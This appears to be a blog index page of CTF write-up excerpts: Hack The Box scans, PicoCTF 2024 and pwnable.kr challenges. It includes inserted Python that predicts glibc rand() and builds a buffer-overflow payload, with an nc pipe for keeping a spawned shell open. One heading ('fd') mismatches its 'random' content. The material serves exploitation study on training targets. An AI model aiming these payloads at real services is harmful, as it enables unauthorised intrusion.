Hack The Box Previse Writeup

Recon

rustscan -a 10.10.11.104 -- -Pn -sVC --min-rate 10000 -oA nmap/tcp

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbdbnxQupSPdfuEywpVV7Wp3dHqctX3U+bBa/UyMNxMjkPO+rL5E6ZTAcnoaOJ7SK8Mx1xWik7t78Q0e16QHaz3vk2AgtklyB+KtlH4RWMBEaZVEAfqXRG43FrvYgZe7WitZINAo6kegUbBZVxbCIcUM779/q+i+gXtBJiEdOOfZCaUtB0m6MlwE2H2SeID06g3DC54/VSvwHigQgQ1b7CNgQOslbQ78FbhI+k9kT2gYslacuTwQhacntIh2XFo0YtfY+dySOmi3CXFrNlbUc2puFqtlvBm3TxjzRTxAImBdspggrqXHoOPYf2DBQUMslV9prdyI6kfz9jUFu2P1Dd
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCnDbkb4wzeF+aiHLOs5KNLPZhGOzgPwRSQ3VHK7vi4rH60g/RsecRusTkpq48Pln1iTYQt/turjw3lb0SfEK/4=
|   256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIICTOv+Redwjirw6cPpkc/d3Fzz4iRB3lCRfZpZ7irps
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-favicon: Unknown favicon MD5: B21DD667DF8D81CAE6DD1374DD548004
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Previse Login
|_Requested resource was login....

May 13, 2024

Daily Pwn or Web1

Because this writeup is for my own reminder, it is very rough and might be incorrect, especially “high frequency troubles”.

4/27 PicoCTF 2024 High Frequency Troubles

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

enum {
    PKT_OPT_PING,
    PKT_OPT_ECHO,
    PKT_OPT_TRADE,
} typedef pkt_opt_t;

enum {
    PKT_MSG_INFO,
    PKT_MSG_DATA,
} typedef pkt_msg_t;

struct {
    size_t sz;
    uint64_t data[];
} typedef pkt_t;

const struct {
    char *header;
    char *color;
} type_tbl[] = {
    [PKT_MSG_INFO] = {"PKT_INFO", "\x1b[1;34m"},
    [PKT_MSG_DATA] = {"PKT_DATA", "\x1b[1;33m"},
};

void putl(pkt_msg_t type, char *msg) {
    printf("%s%s\x1b[m:[%s]\n", type_tbl[type]....

May 10, 2024

Hack The Box Valentine Writeup

Recon

PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| ssh-dss
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRkMHjbGnQ7uoYx7HPJoW9Up+q0NriI5g5xAs1+0gYBVtBqPxi86gPtXbMHGSrpTiX854nsOPWA8UgfBOSZ2TgWeFvmcnRfUKJG9GR8sdIUvhKxq6ZOtUePereKr0bvFwMSl8Qtmo+KcRWvuxKS64RgUem2TVIWqStLJoPxt8iDPPM7929EoovpooSjwPfqvEhRMtq+KKlqU6PrJD6HshGdjLjABYY1ljfKakgBfWic+Y0KWKa9qdeBF09S7WlaUBWJ5SutKlNSwcRBBVbL4ZFcHijdlXCvfVwSVMkiqY7x4V4McsNpIzHyysZUADy8A6tbfSgopaeR2UN4QRgM1dX
|   256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+pCNI5Xv8P96CmyDi/EIvyL0LVZY2xAUJcA0G9rFdLJnIhjvmYuxoCQDsYl+LEiKQee5RRw9d+lgH3Fm5O9XI=
80/tcp  open  http     syn-ack Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http syn-ack Apache httpd 2....

May 1, 2024

Hack The Box Cronos Writeup

This one was improved to show a little of the notes I took while working on it.

recon

rustscan -a 10.10.10.13 -- -sVC -T5 --min-rate 10000 -oA nmap/tcp

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkOUbDfxsLPWvII72vC7hU4sfLkKVEqyHRpvPWV2+5s2S4kH0rS25C/R+pyGIKHF9LGWTqTChmTbcRJLZE4cJCCOEoIyoeXUZWMYJCqV8crflHiVG7Zx3wdUJ4yb54G6NlS4CQFwChHEH9xHlqsJhkpkYEnmKc+CvMzCbn6CZn9KayOuHPy5NEqTRIHObjIEhbrz2ho8+bKP43fJpWFEx0bAzFFGzU0fMEt8Mj5j71JEpSws4GEgMycq4lQMuw8g6Acf4AqvGC5zqpf2VRID0BDi3gdD1vvX2d67QzHJTPA5wgCk/KzoIAovEwGqjIvWnTzXLL8TilZI6/PV8wPHzn
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWsTNMJT9n5sJr5U1iP8dcbkBrDMs4yp7RRAvuu10E6FmORRY/qrokZVNagS1SA9mC6eaxkgW6NBgBEggm3kfQ=
|   256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBIQsAL/XR/HGmUzGZgRJe/1lQvrFWnODXvxQ1Dc+Zx
53/tcp open  domain  syn-ack ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    syn-ack Apache httpd 2....

April 30, 2024

PicoCTF 2024 Writeup

I took part in PicoCTF 2024 and wrote up my solutions. The problems I solved are listed below.

Binary Exploitation: format string0, format string1, format string2, format string3, heap 0, heap 1, heap 2, heap 3, babygame03, high frequency troubles
Cryptography: interencdec, custom encryption, c3, rsa_oracle, flag_printer
Forensics: scan surprise, verify, canyousee, secret of the polyglot, mob psycho, endianness-v2, blast from the past, dear diary
General Skills: super ssh, commitment issues, time machine, blame game, collaborative development, binhexa, binary search, endianness, dont-you-love-banners, sansalpha
Reverse Engineering: packer, factcheck, winantidbg0x100, classic crackme 0x100, weirdsnake, winantidbg0x200, winantidbg0x300
Web Exploitation: bookmarklet, webdecode, introtoburp, unminify, no sql injection, trickster, elements

I'm glad to see I've grown since last year....

April 30, 2024

Nightmare Stack Bof Part2

Boston Key Party 2016 Simple Calc

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

This binary reads two inputs. The first is the number of calculations; the second selects which calculation to perform. The result of each calculation is written to heap space (heap base + index of the current calculation * 4). When I choose to end the calculations, it copies all of the results stored in that heap space into a local variable....

April 30, 2024

Nightmare Stack BOF Part1

Review of the Stack BOF chapter in Nightmare.

TAMU'19 Pwn1

Arch:     i386-32-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      PIE enabled

This binary reads three inputs; the first two are compared against fixed strings. The last input is read with gets, which imposes no limit on input length, so I can overwrite the local variable that is compared against 0xdea110c8.

import pwn
import struct

io = pwn.process("./pwn1")
io....

April 30, 2024

pwnable.kr passcode writeup

I solved passcode on pwnable.kr and wrote this writeup. I learned quite a lot from it. The challenge description is as follows:

Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh [email protected] -p2222 (pw:guest)

A vulnerability that allows writing an arbitrary value to an arbitrary address

The challenge's source code is below.

passcode.c

#include <stdio.h>
#include <stdlib.h>

void login(){
    int passcode1;
    int passcode2;

    printf("enter passcode1 : ");
    scanf("%d", passcode1);
    fflush(stdin);

    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
    scanf("%d", passcode2);

    printf("checking....

April 30, 2024

pwnable.kr fd writeup

I solved random on pwnable.kr and wrote this writeup. The challenge's source code is as follows:

#include <stdio.h>

int main(){
    unsigned int random;
    random = rand();    // random value!

    unsigned int key=0;
    scanf("%d", &key);

    if( (key ^ random) == 0xdeadbeef ){
        printf("Good!\n");
        system("/bin/cat flag");
        return 0;
    }

    printf("Wrong, maybe you should try 2^32 cases.\n");
    return 0;
}

glibc's rand function returns pseudo-random numbers from a sequence that is fixed once the seed is set with srand: until srand is called again, rand produces the same sequence for the same seed. When rand is used without ever calling srand, the default seed is used. This program only calls rand, so random takes the same value on every run. So if I look at the value of random during execution and enter the value that XORs with it to 0xdeadbeef, I should get the flag.

pwndbg> disass main
Dump of assembler code for function main:
   0x00000000004005f4 <+0>:     push   rbp
   0x00000000004005f5 <+1>:     mov    rbp,rsp
   0x00000000004005f8 <+4>:     sub    rsp,0x10
   0x00000000004005fc <+8>:     mov    eax,0x0
   0x0000000000400601 <+13>:    call   0x400500 <rand@plt>
   0x0000000000400606 <+18>:    mov    DWORD PTR [rbp-0x4],eax
   0x0000000000400609 <+21>:    mov    DWORD PTR [rbp-0x8],0x0
   0x0000000000400610 <+28>:    mov    eax,0x400760
   0x0000000000400615 <+33>:    lea    rdx,[rbp-0x8]
   0x0000000000400619 <+37>:    mov    rsi,rdx
   0x000000000040061c <+40>:    mov    rdi,rax
   0x000000000040061f <+43>:    mov    eax,0x0
   0x0000000000400624 <+48>:    call   0x4004f0 <__isoc99_scanf@plt>
   0x0000000000400629 <+53>:    mov    eax,DWORD PTR [rbp-0x8]
   0x000000000040062c <+56>:    xor    eax,DWORD PTR [rbp-0x4]
   0x000000000040062f <+59>:    cmp    eax,0xdeadbeef
   0x0000000000400634 <+64>:    jne    0x400656 <main+98>
   0x0000000000400636 <+66>:    mov    edi,0x400763
   0x000000000040063b <+71>:    call   0x4004c0 <puts@plt>
   0x0000000000400640 <+76>:    mov    edi,0x400769
   0x0000000000400645 <+81>:    mov    eax,0x0
   0x000000000040064a <+86>:    call   0x4004d0 <system@plt>
   0x000000000040064f <+91>:    mov    eax,0x0
   0x0000000000400654 <+96>:    jmp    0x400665 <main+113>
   0x0000000000400656 <+98>:    mov    edi,0x400778
   0x000000000040065b <+103>:   call   0x4004c0 <puts@plt>
   0x0000000000400660 <+108>:   mov    eax,0x0
   0x0000000000400665 <+113>:   leave
   0x0000000000400666 <+114>:   ret
End of assembler dump....

April 30, 2024
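As an added example (my own code, not from the random writeup above): instead of reading random out of the debugger, predict it. Calling rand() without srand is defined to behave like srand(1), and glibc's generator for that seed is the TYPE_3 additive feedback generator (31-word state seeded by a Park-Miller LCG, cycled 310 times, each output being (r[i-31] + r[i-3]) mod 2^32 shifted right by one). The block reimplements that generator in pure Python and derives the value to type at scanf("%d") so that key ^ random == 0xdeadbeef. The function names glibc_rand_sequence and solve_key are mine; the generator follows glibc's random_r.c and is not an API of the challenge.

```python
# Added example: predict glibc rand() offline and derive the pwnable.kr "random" key.
# glibc_rand_sequence / solve_key are names I chose; they are not part of the challenge.

MOD31 = 2147483647          # 2**31 - 1, modulus of the Park-Miller seeding LCG
MASK32 = 0xFFFFFFFF


def glibc_rand_sequence(seed=1, count=1):
    """Return the first `count` values glibc's rand() produces after srand(seed).

    srand(1) is what a program that never calls srand implicitly uses, so the
    default argument reproduces the challenge binary's `random`.
    """
    seed &= MASK32
    if seed >= 0x80000000:              # srand takes a signed 32-bit int
        seed -= 0x100000000
    if seed == 0:                       # glibc replaces seed 0 with 1
        seed = 1

    r = [0] * (344 + count)             # 34 seeding words + 310 discarded outputs
    r[0] = seed
    for i in range(1, 31):
        # r[i] = (16807 * r[i-1]) mod (2**31 - 1), using C's truncating '%'
        v = 16807 * r[i - 1]
        v = v % MOD31 if v >= 0 else -((-v) % MOD31)
        if v < 0:
            v += MOD31
        r[i] = v
    for i in range(31, 34):             # the state wraps: r[31..33] = r[0..2]
        r[i] = r[i - 31]
    for i in range(34, 344 + count):    # additive feedback with 32-bit int wraparound
        r[i] = (r[i - 31] + r[i - 3]) & MASK32
    # random_r() returns the state word shifted right by one (31-bit result)
    return [r[i] >> 1 for i in range(344, 344 + count)]


def solve_key(random_value, target=0xDEADBEEF):
    """Decimal to type at scanf("%d") so that (key ^ random) == target.

    `key` is an unsigned int in the binary, but %d parses a signed decimal,
    so the 32-bit result is returned in its signed representation.
    """
    key = (random_value ^ target) & MASK32
    return key - 0x100000000 if key >= 0x80000000 else key


if __name__ == "__main__":
    rnd = glibc_rand_sequence()[0]
    print(f"random = {rnd} (0x{rnd:08x}); enter: {solve_key(rnd)}")
```

Since the binary stores the parsed value into a 32-bit slot and only the bit pattern matters for the XOR, the signed form solve_key returns and its unsigned counterpart select the same bits; the signed one is the value %d is defined to accept.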

pwnable.kr bof writeup

I solved bof on pwnable.kr and wrote this writeup. The challenge description is as follows.

Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at : nc pwnable.kr 9000

Judging by the name, this one uses a buffer overflow vulnerability.

$ wget http://pwnable.kr/bin/bof
$ wget http://pwnable.kr/bin/bof.c

The source code is as follows:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

From gets on Wikipedia (Japanese): gets is a C function that reads one line from standard input. It has the fatal flaw that buffer overruns cannot be prevented, and it was removed from the standard C library starting with the C11 standard revised in 2011[1]....

April 30, 2024
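As an added example (my own code, not from the bof writeup or from the Nightmare Part1 entry above): the distance from overflowme to the `key` argument is not stated in either excerpt, so this script treats it as unknown. It generates a de Bruijn pattern whose every 4-byte window is unique, so the 32-bit value that ends up in `key` after the crash (read from gdb at the `cmp`) maps back to the exact offset, then builds the gets() payload that places 0xcafebabe there. The functions cyclic, cyclic_find and build_payload mirror pwntools' helpers by name but are reimplemented here so the script needs only the standard library; the same script serves the TAMU'19 pwn1 entry by passing 0xdea110c8 as the key.

```python
# Added example: locate the overwrite offset with a cyclic pattern, then build the payload.
# cyclic / cyclic_find / build_payload are my reimplementations, not the challenge's code.
import struct
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"   # no 0x0a, so gets() reads the whole pattern
SUBSEQ = 4                                 # window length: one 32-bit value = one offset


def _de_bruijn(alphabet, n):
    """Yield the de Bruijn sequence B(k, n) lazily (standard recursive construction)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length):
    """First `length` bytes of the pattern; every 4-byte window occurs exactly once."""
    return bytes(islice(_de_bruijn(ALPHABET, SUBSEQ), length))


def cyclic_find(value, max_length=0x10000):
    """Offset of a 4-byte window in the pattern, or -1 if it is not a pattern window.

    `value` may be the bytes themselves or the 32-bit integer seen in a register
    or stack slot (little-endian, e.g. the value compared against 0xcafebabe).
    """
    if isinstance(value, int):
        value = struct.pack("<I", value & 0xFFFFFFFF)
    return cyclic(max_length).find(value)


def build_payload(offset, key=0xCAFEBABE):
    """`offset` filler bytes to reach the overwritten variable, then `key` little-endian."""
    payload = b"A" * offset + struct.pack("<I", key)
    assert b"\n" not in payload, "gets() stops at newline; payload must not contain 0x0a"
    return payload


if __name__ == "__main__":
    # 1) feed cyclic(100) to the binary under gdb and read the value that landed in key
    # 2) turn that value into the offset, 3) build the real payload
    observed = 0x6161616A                       # hypothetical value read from the crash
    offset = cyclic_find(observed)
    print(f"offset = {offset}")
    print(build_payload(offset).hex())
```

Usage: pipe the payload to the binary but keep stdin open afterwards, or the spawned /bin/sh exits immediately when it hits EOF (for example `(python3 exploit.py; cat) | nc pwnable.kr 9000`). The observed value in the block is a placeholder; the real one is whatever gdb shows in the register at the `cmp` after feeding the pattern.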